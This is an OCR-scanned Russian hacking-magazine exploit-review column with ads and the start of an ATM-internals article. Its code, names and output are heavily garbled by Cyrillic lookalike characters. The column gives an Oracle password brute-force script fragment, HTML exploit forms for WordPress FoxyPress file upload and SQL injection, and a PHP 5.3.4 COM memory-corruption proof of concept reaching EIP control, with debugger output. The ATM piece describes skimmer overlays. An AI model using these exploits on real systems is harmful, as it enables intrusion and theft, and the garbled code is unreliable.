5а11:_Ііех.сІесосІе( ' Ріех ' ) . разБыогсП 

ргіпі: ' Оесгур-РесІ 5е55Іоп_ісІ -Рог разБыогсІ "%5" <-■ 

І5 %5‘ % (разБыогсІ. 5е55Іоп_ісІ.епсосІе( 'Ріех' ))_ 



# Если последние восемь символов идентификатора - 

# 88888888. то принимаем пароль за верный 

і-р зезБІоп ісІ[40:] == ' \х08\х08\х08\х08\х08‘ : 

ргіпі; 'РА55ІЛІОКО 15 "%5"' % разБЫОГСІ 
Ьгеак 

Для его работы необходимо забить свои значения переменных 
5е55Іоп_Ьех и 5аІ1;_Ьех, которые с легкостью можно узнать при по- 
мощи ѴѴігезЬагк. Очевиднотакже, что потребуется расширение 
списка подбираемых паролей, л ибо три в иа л ьная замена его 
на словари с паролями в виде файлов (таких словарей на просто- 
рах Сети огромное количество), либо создание дополнительной 
функции генерации паролей. 



ТАК6ЕТ5 



ОгасІеОа1аЬа5е5егѵег10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2 
и 11.2.0.3. 



зоіитіом 



Установить октябрьский патч отОгасІе — доо.дІ/РѴѴТУо . 

Еслиустановка патча не представляется возможной, то существу- 
ет несколько «костылей»: 

1. Можно использоватьбазу данных версии ІОд, в которой протокол 
аутентификации не является уязвимым. 

2. Прописать на клиентском и серверном конфигездіпеі.ога строч- 
ку 5аіМЕТ.АЕІОѴѴЕО_ІО0ОМ_ѴЕР5ІОМ=12, которая задействует 
новый механизм аутентификации. 

3. Настроить внешнюю аутентификацию через 551 или службу 
каталогов. 

4. Ну и конечноже, рекомендуется использоватьслучайно сгенери- 
рованные пароли длиной не менее девяти символов, а лучше — 
все двадцать. Это сильно усложнит подбор пароля за разумный 
промежуток времени. 



5Ііа1:іс риЫіс 

-Рипсііоп ^е1і($пате) { 

і-р (І55е1і(5е1-Р: :$_соокіе55е1;[$пате] ) ) { 
геіигп зеІ-Р: : $_соокіе55е1;[$пате] ; 

} еізе і-р (І55е 1і($ С00КІЕ[ір5Ке^І5Іігѵ: : $5е1;1;іп§54-і 
[ ' соокіе_ісІ ' ] .$пате] ) ) { 

$_ѵа1ие = $_С00КІЕ[ір5Ке^І5І:гѵ: :$5е1і1:іп^54-' 

[ ' соокіе ісі ' ] .$пате] ; 

і-р (5иЬ5Іі г ($_ѵа1ие. 0. 2^ == ' а : ' ^ { 

геіигп ип5егіа1І2е(5І;гір5Іа5Ііе5(иг1сІесосІе<-‘ 

($ _ ѵа1ие)) ); ^ 

} 

Уязвимость проявляется при вызове метода ипзегіаііге, которому 
передается значение пользовательских да иных без должной 
фильтрации. Заложена всего лишь одна проверка — что строка 
начинается с символов «а:», этого недостаточно, чтобы предот- 
вратить внедрение объекта РНР. Атакующий может послать 
сериализованную строку, которая будет представлять собой 
массив объектов. Это может быть использовано для исполнения 

произвольного РНР-кода через метод сІезІгисіО класса бЬМаіп, 

который, в свою очередь, вызываетметодѵѵгіІеОеЬидЕод для 
записи отладочной информации в лог-файл. Произвольный РНР- 
код может быть внедрен исключительно через переменную 
$_5ЕРѴЕР['01ІЕРУ_5ТРІМ6'], поэтому для успешной эксплуата- 
ции уязвимости необходима активированная опция 5Ьог1_ореп_ 
Іад. Скачать эксплойт можно по этой ссылке: доо.д1/004Мс . 



ТАК0ЕТ5 



ІПѴІ5І0П Роѵѵег ВоагсІ 3.1.2 и далее вплоть до 3.3.1. 



зоіитіом 



Установить соответствующее обновление. 



3 



Множественные уязвимости в ѴѴогсІРгевв 
РохуРгеввРІидіп 



СѴ55Ѵ2 



6.5 



(АѴ:М/АС:Е/Аи:5/С:Р/І:Р/А:М) 



И вновь ѴѴогсІРгезз. И вновь исследователь Янек Винд (ЗапекѴіпсІ 
«ѵѵагахе»). Вотэто действительно множественныеуязвимости — 
в отчете фигур и РУ ют целых двадцать пунктов. Этот плагин можно 
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смело использовать в качестве образцово-показательного при- 
мера небезопасного веб-приложения. Мы рассмотрим наиболее 
интересные пункты из всего отчета. С полной версией можно 
ознакомиться по ссылке доо.дІ/Цпгг . 



ЕХРЮІТ 



Загрузка произвольного файла в скрипте сіоситепІЬапсіІег.рЬр. 

Причина уязви мости — отсутствие должных проверок в части функ- 
циональности загрузки файла. Для успешной эксплуатации нужно 
располагать аккаунтом администратора. Кусок уязвимого кода: 

і-р ( ! етр1:ѵ($_РІІЕ5’) ) I 

$1;аг§еТ:ра1;Іі = АВ5РАТН . ІМѴЕМТ0КУ_01_10САІ_0ІК; 



$пеыб1епате = -Рохурге55_Сепега1:еМеыРі1еМате4-> 
($б1еЕх1:еп5Іоп^ $іпѵеп1;огу_ісІ ^ 

$1:аг^е1:ра1:Іі . $ргебх’) ; 

ІІаг§е1;ра1:Іі = $1:аг§е1:ра1;Іі . $пеыб1епате; 

і-р (т оѵе_ир1оасІесІ_б1е($_РІІЕ5[ ' Рі1есіа1;а ' 

[ ’1;тр_пате' ] ^ $1;аг§е1;ра1;Іі) ) 




Как мы видим, проверками параметров функции, загружающей 
файл, и не пахнет. В результате атакующий способен загружать 
на сервер файлы с произвольным расширением. В случае с РНР- 
файлами это ведет к классическому РСЕ (удаленному исполнению 
кода). Сценарий эксплуатации. Открываем страницу редактиро- 
вания продукта: 

Ігіііір : //1оса1Іі05І:/ыр342/ыр-асІтіп/ро5І: . рІір?4-< 

ро5І:=43&ас1:іоп=есІі1: 

Находим ссылку под названием 0іді1;аІ Ооѵѵпіоасіз. Кликаем 
на кнопку «Вгоѵѵве Рііез». Выбираем РНР-фай л, который нужно 
загрузить. В результате появится ссылка, по которой доступен 
загруженный файл: 

Іі1;1;р : //1оса1Іі05І;/ыр342/ыр-соп1;еп1;/4-‘ 
іпѵеп1;огу_сІоып1оасІаЫе5/ту_сІоып1оасІ_зы82ки0329_43 . рбр 

Переходим по ссылке и радуемся результату выполнения скрипта. 

501-инъекция в скрипте сІоситепІИапсІІег.рИр. Причина воз- 
никновения — недостаточная фильтрация пользовательских дан- 
ных. Для успешной эксплуатации потребуется залогиниться под 
администратором. Кусок уязвимого кода, начиная со строки 14: 

і-р Петр1:ѵ($_РІІЕ$П I 

$іпѵеп1;огу_ісІ = Іп1:ѵа1( $_Р05Т[ ' іпѵеп1;огу_ісІ ' ] ); 
$сІоып1оасІаЫе1:аЫе = $_Р05Т[ ' ргебх ' ] ; 



$риегу = "ІМ5ЕКТ ІЫТО " . $с1оып1оас1аЫе1:аЫе <-■ 

. " 5ЕТ іпѵеп1іогѵ_ісІ="' ^ 

. $іпѵеп1:огу_ісІ . б1епате='" ^ 

. ту5р1_езсаре_5І:гіп§($пеѵ\/б1епате) <-■ 



...ЗДЕСЬ НЕТ ФИЛЬТРАЦИИ, 
ПОЭТОМУ АТАКУЮЩИЙ ИМЕЕТ 
ПРЕКРАСНУЮ ВОЗМОЖНОСТЬ 
ВСТАВЛЯТЬЛЮБЫЕ ДАННЫЕ 



ПерехваченныеданныесессиивпроцессеаутентификациивОгасІе 

. " ' . тахсІоып1оасІ5= ' " ^ 

. ту5д1_е5саре_5І;гіп§($сІоып1оасІаЫетахсІоѵ\/п1оасІ5) ^ 

. " ' . зіаііиз = 1" ; 

$^л^рсIЬ->^иегу($^иегу); 

Какты могзаметить, переданный пользователем Р05Т- 
параметр 'ргеЛх' используется в запросе 501 "ІМ5ЕРТ ІМТО" 
в качестве имени таблицы. Здесь нет никакой фильтрации, 
поэтому атакующий имеет прекрасную возможность вставлять 
любые данные в любые таблицы в рамках текущей базы данных. 
Пример эксплуатации: 

<ІгІ:пі1> 

<Ьос1у> 

<сеп1іег> 

<-Рогт ас1:іоп="ІтІ:1:р: //1оса1Ііо5І:/ыр342/ыр-асІтіп/4-> 
асішіп-азах. рІір?ас1:іоп=-Рохурге5 5СІоѵ\/п1оасІ&5есигі1;у=^ 
844Ь64се45" те1;ІіосІ="ро5І;" епс1;уре="ти11;іраг1;/-Рогт-сІа1;а"> 

<іпри1: 1:уре="б1е" пате="Рі1есІа1:а"> 

<іпри1: 1:уре="ІіісІсІеп" пате=^ 

"сІоыпІоасІаЫетахсІоыпІоасІз" ѵа1ие="1"> 

<іпри1: 1:уре="ІіісІсІеп" пате="ргебх" ѵа1ие="ыагахе"> 
<іпри1; 1;уре="5иЬті1:" ѵа1ие="Тез1;"> 

</-Рогт> 

</сеп1:ег> 

</ЬосІу> 

</Іі1;т1> 

501-инъекция в скрипте Рохурге55-тападе-етаіІ5.рЬр. 

Причина возникновения также недостаточная фильтра- 
ция пользовательских данных, а именно 6 ЕТ- пара метр ісі. 

Для успешной эксплуатации потребуется залогиниться под 
администратором. Ниже приведен кусок уязвимого скрипта 
і^охургезз-тападе-етаіІз.рЬр, начиная с 14-й строки: 

■Рохургез5_тапа§е_етаіІ5_ра§е_1оасІ( ) 

{ 

^ІоЬаІ $ырс1Ь: 



і-р(І5зе1:($_6ЕТ [ ' шосіе ' ] ^ && $_СЕТ[ ' тосіе ' ] ~ ' есШ; ' ) 

і 

і-р(І5 5е1:($ РО$Т[ ' -Роху_ет_5аѵе ' ] ) ) 

-Л 
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Обзор эксплойтов 



$5д1 = "ЦРРАТЕ ". $ырсІЬ->рге1іх . 

"■Рохурге55_етаі1_1:етр1а1:е5 зеі: 
■Роху_етаі1_1:етр1а1:е_пате= ' " . $1;етр1а1:епате \ 

^охѵ_етаі1_1:етр1а1:е_5иЬіес1:= ' " .$5иЬіес1і. " ' . 

■Роху_етаі1_1:етр1а1:е_етаі1_ЬосІу= ' " . $соп1;еп1; . " ' ^ 
■ррху_етаі1_іетр1а1;е_-Ргот= ' " $-Ргот . 

ЫН Е К Е е та і 1_1; ешр 1 а 1; е_і с1 = " . $_С Е Т [ і 6] у 

Пример эксплойта: 

<ІгІ:т1> 

<ЬосІу> 

<сеп1:ег> 

<-Рогт ас1;іоп="ІтІ;1;р : //1оса1Іі05І;/ыр342/ыр-асІтіп/4-> 
есііі; . рІір?ро5І:_1;уре=-Рохурге55_ргосІис1:&ра§е= ^ 
тапа§е-етаіІ5&тосІе=есІі1:&ісІ=ыагахе" те1:ІіосІ = "ро5І:"> 

<іпри1і 1іѵре="ІіісІсІеп" пате="-Рохѵ_ет_5аѵе" ѵа1ие="1"> 
<іпри'1: 1;уре="ІіісІсІеп" пате="1:етр1а1:епате" ѵа1ие="2"> 
<іпри'1: 1;уре="ІіісІсІеп" пате="5иЬ]ес1;" ѵа1ие="3"> 
<іпри1; 1;уре="5иЬті1;" ѵа1ие="Те5І:"> 

</-Рогт> 

</сеп1:ег> 

</ЬосІу> 

</ІгІ:т1> 

Резул ьтат работы: 

ЫогсІРгеББ сІа1:аЬа5е еггог: 

[Цпкпоып соіитп 'ыагахе' іп 'ыбеге сіаизе'] 



ЦРРАТЕ ѵ\/р_-Рохурге55_етаі1_1:етр1а1:е5 ч-- 
5ѲІ; -Роху_етаі1_1:етр1а1;е_пате= ' 2 ' ^ 
■Роху_етаі1_1:етр1а1:е_5иЬ]ес1;= ' 3 ' ^ 
■Роху_етаі1_1;етр1а1:е_етаі1_ЬосІу= ' ' ^ 

-Роху_етаі1_1:етр1а1:е_-Ргот= ' ' <-■ 

ЫНЕКЕ етаі1_1:етр1а1:е_ісі=ыагахе 



ТАК6ЕТ5 



ѴѴогсІРгезз РохуРгезз РІидіп 0.4. 2. 5. 



зоіитіом 



Обновиться до последней версии Іна момент написания — 
0.4. 2. 7). 

4 ' I Выполнение произвольного кода в РНР 
_ 5.3.4 ѴѴіп Сот Мосіиіе Сот 5Іпк 



СѴ55Ѵ2 7.5 



(АѴ:М/АС:1/Аи:М/С:Р/І:Р/А:М) 

Уязвимость была найдена в модуле Сопп_зіпк, обеспечиваю- 
щем возможность взаимодействовать с СОМ и .МЕТ в ѴѴіпбоѵѵз. 
Ошибка позволяет атакующе му выполнить произвольный код 
в системе с правами пользователя, запустившего скрипт. 



ЕХРЮІТ 



Для начала рассмотрим простейший пример работы с модулем. 
Следующий код запускает Іпііегпеі; Ехріогег и открывает стра- 
ничку Ооодіе: 




компьютерного 



{ОБУЧЕНИЯ I 

«СПЕЦИАЛИСТ» 

при МГТУ им. НЭ.Еаумана 



Учебный Центр №1 в России!* 



Более 1000 курсов: 

• Этичное хакерство'^ 

• Обновленная линейка курсов МісгозоЛ 

(ѴѴІПСІОѴѴ5 8, ѴѴІпсіоѵѵз $егѵег 201 2 , ѴѴіпсІо\л/5 8, ѴізиаІ Бикііо 201 2 , $01 Бегѵег 201 2) 

• Сетевые технологии (Цпіх, Сізсо и др.) 

• Программирование и СУБД 

• Облачные технологии, виртуализация 

• Информационная безопасность 

• Интернет-технологии 

• Управление проектами и ІТ5М 

• Курсы Арріе; Мае, іРаб, іРНопе"^ 



21 год на рынке ІТ-обучения! 

•Лучший учебный Центр МісгобоЛ в России! 

• Удобный формат обучения: очное, вебинар, 
открытое и индивидуальное обучение 

• Гарантированное расписание на 201 2-201 3 г. 

• Все преподаватели - практикующие специалисты 

• Подготовка к международным сертификациям 

• Государственные программы подготовки 



Запишитесь сейчас и получите скидку до 20%* 

♦♦Подробности смотрите на сайте ѵѵѵѵ\л/.5ресіаІі5іги 



Аишогііеа 
Тгаіпіп 



Рагіпег 



Места проведения занятий рядом с метро: Бауманская, Белорусская, Парк Победы, ® \ѵѵу\л/.$ресіаІі$1.ги 

Полежаевская, Пр.-т Вернадского, Савеловская, Таганская, Тульская <5= +7(495)232-3216 



реклама 













ВЗЛОМ/ОБЗОР эксплойтов 









//*вір ■ 
Іеір- 
(с«х - 
1()«о<1гма> ’ 
Іахваргау ' 



мііп«лп«і І’іопірі )іК|і < 



//048д0190 
эсЬо асЕІвіК* 



рЬр «X* • Р«І«І Арріклііап ЕхШ 



//19200 ”4» АЛяЛ 

Сог((ахса«а< ^ 



іпрЧчпімЧрЬрЬиуз >рЬр < 



Запуск простого МеззадеВох'а В РНР5.3.4ѴѴІП Сот МосІиІеСот_5Іпк 



*** ЕККОК: ЗушЬоІ Ліе соиісі по1: Ье -РоипсІ. Ре-Раи11:есІ 1:о 
ехрогі; БушЬоІБ Тог С : \ыатр\Ьіп\рІір\рІір5 .4. 3\ріір51;5 .сііі 
- рІірЗТБ ! ріір_5і:г-р1:іте+0хасіс : 



1Ѳ2-Р59ЬсІ 8ЬѲ6 ШОУ еах.сіыогсі рТг [езі] 
СІ5 : 0023 : 43434343= ???????? 



102-р59Ь-р 


8СІ4СІСІ4 


Іеа 


есх^ [еЬр-2СЬ] 


102-Р59С2 


51 


ри5Ь 


есх 


102-Р59СЗ 


53 


ризЬ 


еЬх 


102-Р59С4 


53 


ризЬ 


еЬх 


102-Р59С5 


56 


ризЬ 


езі 


102-Р59С6 


-Р-Р5010 


саіі 


сіыогсі рТг [еах+10Ь] 



Таким образом можем получить контроль над ЕІР: 



<?рІір 

с1а55 ІЕЕѵеп1:5іпкег { 

ѵаг $1іегпііпа1:есІ = ТаТзе: 



-РипсТіоп Рго^ге 5 5СІіап^е($рго^ге5 5 . $рго§ге55гпах) { 

есРіо " Роыпіоа сі рго§ге55: $рго§ге55 $рго§ге55тах\п"; 

} 

-РипсТіоп Роситеп1:Сотр1е1:е(&$сІот. $иг1) I 

есбо "РоситепТ $иг1 сотрТеТеХп" ; 

- } 

-РипсТТоп ОпОиіІіП I 

есбо "Оиі1:!\п": 

$1:ІіІ5->1:егтіп а1:есІ = Тгие; _ 

} 

} 

$іе_ = пеы СОМ ( " ТпТе гпеТЕхрТогег.АррИсаТТоп"^ : 

$5Іпк = пеы ІЕЕѵеп1і$ іпкегП ; 

сот_еѵеп1:_5Іпк($іе. $5Іпк^ "Р1лІеЬВгоы5егЕѵеп1:52" ) ; 

$іе->ѴІ5ІЫе = Тгие: 

$іе- >Маѵ і§а1:е( "Іі1:1:р : //ыыы. §оо§1е . сот" ) ; 

ыііі1е( ! $5Іпк- >1:егтіпа1:есП { 

сот_те55а§е_ритр(4000) ; 

і 

$іе = пиіі; 

?> 

Первый аргумент в вызове сопп_еѵеп1;_5Іпк — адрес вызывае- 
мого СОМ-объекта, и он определяется пользователем. Никаким 
дополнительным проверкам этотадрес не подвергается, и этот 
адрес используется напрямую. Пример кода, приводящего 
к Ассевв Ѵіоіаіііоп: 

< ?рІір 

$Ьц-р-Рег = БТг гереаТР "В" . 1000 V. 

$ѵѴаг = ^^ш_VАКIАNТ( 0x43434343); 

$ѵѴаг2 = пеы ѴАКІАМТ(0х41414141) ; 
сот_еѵеп1:_5Іпк(ІѵѴаг^ $ѵѴаг2 ^ $ЬиТ-Рег ); 

?> 

Сам Ассезб Ѵіоіаіііоп: 

(310.1-Рс): АССѲ55 ѵіоІаТіоп - сосіе С0000005 (йгбТ сМапсе) 

РІГ5І; сбапсе ехсерТіопБ аге герогТесІ ЬеТоге апу 
ехсерТіоп бапсІ1іп§. 



Т6І5 ехсерТіоп тау Ье ехресТесІ апсі ЬапсІІесІ. 
еах=00000000 еЬх=00000000 есх=00372асІ0 есіх=0114сісі88 
051=43434343 есІі=0114сІ9Ь8 е1р=102Т59Ьс1 е5р=00сіТ988 
еЬр=00сіТ9сІс іор1=0 пѵ ир еі р1 2 Г па ре пс 
С5 = 001Ь 55 = 0023 СІ5 = 0023 Ѳ5 =0023 -р5 =003Ь §5=0000 
еЛ=00010246 



<?рЬр 

$еір ="\х44\х43\х42\х41"; 

//$еір= "\х4Ь\хе8\х57\х78" : зтр есіі 

$еах ="\х80\х01\х8сІ\х04" : 

$сІеосІгап1:=" " ; 

ІахѳБргау = 5І:г_гереа1: ($еір.$еах.0х80) : 



//048СІ0190 

есЬо 5І:г1еп($ахе5ргаѵ) ; 



//19200 == 4В32 4Ь00 

-Рог ($ахееТ-Рес1:=0 ; $ахее-р -Рес1 :<0х4В32 ; $ахееТ -Рес1:++) 

{ 

$сІеосІгап1:.=$ахе5ргау: 

} 



$1іегтіпа1:е = "Т"; 

$ц[] =$сІеосІгап1: ; 

$г[] =$сІеосІгап1: . $1;егтіпа1;е; 
$а[] =$сІеосІгап1: . $1іегтіпа1:е ; 
$5[] =$сІеосІгап1: . $1:егтіпа1:е ; 



$ѵѴаг = пеы Ѵ АКІАМТ(0х048сІ0000+180^ ; 

$Ьи-р-Рег = "\х90\х90\хсс\хсс\х41\<много_х41>"; 
$ѵаг2 = пеы ѴАКІАМТ ( 0x41414242 ) ; 



сот_еѵеп1:_5Іпк($ѵѴаг.$ѵаг2.$Ьи-р-Рег) ; 
?> 



В результате запуска скрипта будем наблюдать следующее: 

(сЬ0.7сІ4): АССѲ55 ѵіоІаТіоп - сосіе С0000005 (ТгзТ сМапсе) 

РІГ5І: сЬапсе ехсерИопБ аге герогТесІ Ье-Роге апу 

ехсерТіоп ЬапсІ1іп§. 



ТЬІ5 ехсерТіоп тау Ье ехресТесІ апсІ ЬапсІІесІ. 
еах=048сІ0180 еЬх=00000000 есх=00с1-Р9Ь0 есІх=0114сІЬс8 
е5І=048сІ00Ь4 есіі=0114сіс20 еір=41414141 е5р=00с1-Р974 

еЬр=00с1-Р9сІс іор1=0 пѵ ир еі р1 гг па ре пс 

С5=001Ь 55=0023 сі5=0023 е5=0023 -р5=003Ь §5=0000 

еРІ=00010246 

41414141 ?? ??? 

Загрузить СВОЙ шелл -код пусть останется в качестве домашне- 
го задания. 



ТАК6ЕТ5 



РНР 5.3.4 и, возможно, более ранние. 



зоіитіом 



Существует обновление, устраняющее данную уязвимость. 
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КС0722С 





РиШге І5 поѵѵ! 



ЛЕГКИЙ 







БЫСТРЫЙ. 

НОВОГОДНИЙ. 



ѵѵѵѵ\л/.3-О.ги/ргоппо2/0722 



РѳКЛама. © 2006-2012 ЗО. Упомянутые и/или используемые 



ЯХХкс/Пр С о§1 ^Соозіеріау 

т р^АNЕ зѵѵітснтс ■ МоЬІІе Зегѵісез г о ' ^ 



Быстрый процессор (2 х 1,5 ГГц) 
6 вариантов оформления 
Две камеры (2+2 Мп) 
ІР5-матрица 
АпсІгоісІ 4.1.1 



В ^ й 



<іт»і Шаяі 



44905 



торговые марки, зарегистрированные товарные знаки, элементы 
интерфейса и фирменной символики являются интеллектуальной 
собственностью их правообладателей. Товар сертифицирован. * 
Будущее сейчас. Цена указана в рублях и носит 
рекомендательный характер для Российской Федерации. 
Фактические цены в магазинах и иных точках продаж могут 
отличаться от указанных в большую или меньшую сторону. 



Компания 30 Где купить? 

Производитель мобильных компьютеров и аксессуаров ѵѵѵѵѵѵ.З-О.ги/Ьиу 




взлом 



Ольга Кочетова (оІда.ѵ.косНеіоѵайдтаіІ.сот) 




КРАТКИЙ КУРС 
ПРЕПАРАЦИИ 
АОТОМАТЕО 
ТЕНЕК 
МАСНІНЕ 



Сколько денег в банко- 
мате? Что интересного 
есть внутри? Безопа- 
сен ли этот девайс? 

Как спастись от злоу- 
мышленников и что де- 
лать, если все-таки 
попался на крючок? 



Идея банковской автоматической денежной 
машины (АТМ — Аиіотаіесі ТеІІег МасЫпе) 
в разное время приходила незнакомым друг 
другу личностям в Японии, Великобритании, 
США, Швеции, но первым попытался зафикси- 
ровать ее Лютер Джордж Симджян. Автор на- 
делил устройство функцией выдачи наличных 
без списания средств со счета — на тот момент 
(1939 год) такой технической возможности 
не существовало. Армяно-американский (по 
некоторым данным турецко-американский) 
изобретатель различных устройств и облада- 
тель более 200 патентов, Симджян предложил 
опробовать аппарат одному из крупнейших 
американских банков Сііу Вапк о1" Меѵѵ Уогк, 
однако через несколько месяцев банкиры от- 
казались от новшества, так как не посчитали 
его применение необходимым. 

Так лавры первопроходца достались Джону 
Шеперд-Бэррону, работавшему по заказу 
компании Ое Іа Рие (британский всемирно из- 
вестный производитель бланков ценных бумаг 
и банковского оборудования). Он обратился 
со своей идеей в банк Вагсіауз, руководство 
которого оказалось дальновиднее своих 
американских коллег и подписало договор, по- 
ложивший начало истории банкоматов. Первый 
и на тот момент единственный банкомат был 
установлен в северном боро Лондона, Энфилде, 
27 июня 1967 года в отделении Вагсіауз. Бан- 
комат выдавал деньги по специальным чекам, 
которые нужно было заранее получать в банке. 
Максимальная сумма, доступная для снятия 
в банкомате в конце 60-х, составляла 10 фунтов. 

Через несколько лет к чеку стали выдавать 
идентификационный номер, прототип нынеш- 
него РІМ-кода (РІМ — РегзопаІ ИепЛЯсаІіоп 



ДЛЯ НАЧАЛА НЕМНОГО ИСТОРИИ 



МиітіЬег). Запатентовал систему аутентифика- 
ции на основе машиночитаемой карты и секрет- 
ного кода к ней другой талантливый шотландец, 
инженер и изобретатель Джеймс Гудфеллоу. 

Впервые массово банкоматы установил 
в 1972 году американский СіЛЬапк, бывший Сііу 
Вапк оі" МеѵѵУогк — тот самый банк, который 
ранее отказался от устройства, предложен- 
ного Симджяном. Первые опііпе-банкоматы, 
носившие название СазЬ-РоіпІ, появились 
в 1972 году в британском банке Ыоусіз. Разра- 
ботанные компанией ІВМ устройства работа- 
ли с пластиковыми картами, оснащенными 
магнитной полосой. 

Позднее появились банкоматы с функцией 
приема наличных (СазЬ Іп) и банкоматы с зам- 
кнутым оборотом наличности (СазЬ Ресусііпд). 

НАШИ ДНИ 

Статистика показывает, что сейчас насчитыва- 
ется более 2,45 миллиона устройств по всему 
миру; самый северный банкомат установлен 
в поселке Лонгйир на острове Шпицберген 
(ІопдуеагЬуеп, БѵаІЬагсІ, Могѵѵау), а самый 
южный — на станции Мак-Мердо в Антарктиде 
(МсМигбо БіаЛоп, АпІагсЛса). 

Клидерам мирового рынка банкоматов 
принято относить так называемую большую 
тройку — американцев МСР и ОіеЬоІсІ и немцев 
ѴѴіпсог МіхсІогЛ В последние годы в России 
к ним присоединились восточные соседи — 
корейцы МаиЛІиз Нуозипд. С недавнего вре- 
мени российские кардхолдеры (сагсІЬоІсІег — 



держатель карты) имеют возможность 
обслуживания на банкоматах отечественного 
производства 00Р5. 

По способу установки современные банко- 
маты делятся на ІоЬЬу (для установки внутри 
помещений) и ТЬгоидЬ ТЬе ѴѴаІІ (для установки 
через стену). С точки зрения функционала бан- 
коматы можно разделить на СазЬ Оиі (класси- 
ческий банкомат на выдачу), СазЬ Іп + Оиі (вы- 
дача + прием, полнофункциональный) и СазЬ 
Ресусііпд (замкнутый оборот наличности). 

«Начинку» для банкоматов производят не- 
сколько фирм, и устройства разных вендоров, 
по сути, представляют собой набор стандарт- 
ных комплектующих. 

А ЧТО ВНУТРИ? 

В верхней части АТМ, именуемой сервисной 
зоной или кабинетом, обычно располагаются 
системный блок, модуль спецэлектрони- 
ки, картридер, криптоклавиатура, чековый 
принтер, видеонаблюдение. Часть банкоматов 
оснащена журнальными принтерами, также 
располагающимися в кабинете. Журнальник 
предназначен для записи лога работы бан- 
комата. В современных моделях его заменил 
электронный журнал, целостность которого 
контролируется цифровой подписью. 

СИСТЕМНИК ОБЫКНОВЕННЫЙ 

Мозг банкомата — системный блок с тради- 
ционным наполнением. На расположенном 
внутри жестком диске установлена операцион- 
ная система с необходимым набором драйве- 
ров и прикладного ПО. Обычно это ѴѴіпбоѵѵз 
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ХР 5Р2/5РЗ, изредка встречаются ЕтЬесІсІесІ/ 
РОЗРеасІу-варианты и уж совсем редко 
ѴѴіпсІоѵѵз МТ и «динозавр» 05/2. Некоторые 
труЪ-банкоматы работают под Ыпих'ом. 

СОФІИ ОБМЕН ДАННЫМІ^ 

Прикладное ПО у каждого производителя 
собственное, разработанное в соответствии 
с отраслевыми стандартами и спецификация- 
ми. ППО, с одной стороны, представляет собой 
интерфейс обслуживания и шину связи с про- 
цессингом, с другой — шину взаимодействия 
с периферийными устройствами. 

Управление банкоматом происходит обычно 
по бс-протоколу; МОС или ООС — бігесі соппесі 
протоколы, разработанные компаниями МСР 
и ОіеЬоІб соответственно. Остальные произ- 
водители либо разрабатывают собственный 
диалект, либо пользуются нативным. Суть бс- 
протокола в том, что АТМ выполняет команды 
процессинга, не принимая решений на уровне 
устройства. Все команды, ответы и состояния 
описаны определенным набором и последова- 
тельностью цифр и букв. 

Невозможно внедриться в «разговор» 
машины и процессинга, не зная протокола 
и особенностей настроекдля конкретного 
устройства! 

Информация о транзакциях шифруется 
на уровне ППО или устройств и передается 
в процессинг по защищенному каналу, обычно 
по протоколу ТСР/ІР (очень редко по Х.25). 
Способ передачи данных и ее защиты вы- 
бирается исходя из особенностей организа- 
ции сети, с использованием специального 
оборудования. 

ИБП 

Корректное завершение работы при отключе- 
нии электричества обеспечивает источник бес- 
перебойного питания. Обычно заряда батареи 
достаточно, чтобы закончить текущую операцию 
и перевести банкомат в режим «Не обслужива- 
ет» (или завершить работу, в зависимости от на- 
строек), но существуют модели СІР5, поддержи- 
вающие рабочий режим устройства от батареи 
на протяжении нескольких десятков минут. 



СПЕЦЭЛЕКТРОНИКА 

Блок специальной электроники у каждого 
производителя банкоматов имеет свои вид 
и название, но назначение одно — управление 
индикацией и датчиками. Работа с банкоматом 
должна быть интуитивно понятна для любого 
пользователя, и этому способствуют индика- 
торы устройств, которые в конкретный момент 
ожидают действий клиента. Обычно подсвечи- 
вают слоты вставки/возврата карты, внесе- 
ния/выдачи денег, слот выдачи чека. Датчики, 
которыми фактически напичкан банкомат, 
фиксируют положение финансовых устройств, 
состояние дверей, изменения температуры, 
наличие вибрации, удара, обеспечивая в том 
числе безопасность АТМ. 



КАРТРИДЕР 

Для обработки карт в банкоматы устанавлива- 
ется картридер, работающий с «полосатыми» 
и чиповыми картами. Обычно используется 
моторизированный вариант, то есть карта 
принимается и возвращается при помощи 
электропривода. На этапе вставки карты 
устройство проводит ее предварительную 
проверку, определяя доступность источника 
данных и их соответствие заданным настрой- 
кам, если карта «подходящая» — выполняется 
выбранная клиентом операция. Безопасность 
каждой модели картридера подтверждается 
соответствующими сертификатами. Но как раз 
картридер наиболее привлекателен для мо- 
шенников, ведь именно этот модуль считывает 
данные с полосы Тгаск2, которые использу- 
ются для проведения транзакции. Злоумыш- 
ленники устанавливают на слот картридера 
скимминговые накладки, содержащие счи- 
тывающую головку и флеш-память, в которую 
записываются полученные данные. 

Для предотвращения скимминга карточных 
данных в картридерах предусмотрена функция 
джиттер — неравномерная подача карты, 
вносящая шум в считанные данные и наруша- 
ющая их структуру. Также используются анти- 
скимминг, активный или пассивный. Смысл 
пассивного заключается в особой конструкции 
слота, которая препятствует установке на- 



кладки, а активный создает нейтрализующее 
электромагнитное поле. 

КРИПТОКЛАВИАТУРА, 

ОНАЖЕРІМ РАРІ 

Для ввода РІМ-кода и других данных исполь- 
зуется ЕРР-клавиатура (Епсгурііоп РІМ Раб), 
безопасность которой подтверждается соот- 
ветствующими сертификатами. Шифрование 
в клавиатуре происходит на ключах ТгірІеОЕЗ 
(также используются алгоритмы 0Е5, Р5А), 
с помощью которых банкомат идентифици- 
руется в процессинге, а также формирует 
криптоблоки транзакционных данных. Данные 
шифруются на паре ключей, загруженных 
в клавиатуру, а расшифровываются только 
на ответной паре в процессинге. В целях без- 
опасности компоненты ключей никогда не вы- 
даются одному сотруднику. РІМ-код вводится 
в криптоклавиатуру, где на ключах формиру- 
ется РІМ-блок, передаваемый в процессинг 
для идентификации кардхолдера. 

РІМ-код не хранится и не передается 
в открытом виде, но мошенников это не оста- 
навливает. Ведь данных полосы карты не- 
достаточно для хищения денежных средств, 
и для выяснения РІМ-кода жулики устанав- 
ливают накладки на клавиатуру, оснащен- 
ные флеш-памятью для хранения считанных 
нажатий. 



«ЛИЦО» 

Иногда вместо накладки мошенники уста- 
навливают скрытую камеру таким образом, 
чтобы в объектив попадали клавиши. Камеру 
обычно прячут в выступающих на корпусе 
банкомата накладках, в рекламных «карма- 
нах», располагающихся над клавиатурой чуть 
выше или сбоку. 

РІМ-код также могут и просто подглядеть. 
Предотвратить это помогут зеркала или 
камеры «обзор за спиной». Зеркала работают 
по принципу автомобильных зеркал заднего 
вида, камеры же комплектуются мини-мони- 
тором, расположенным на лицевой панели 
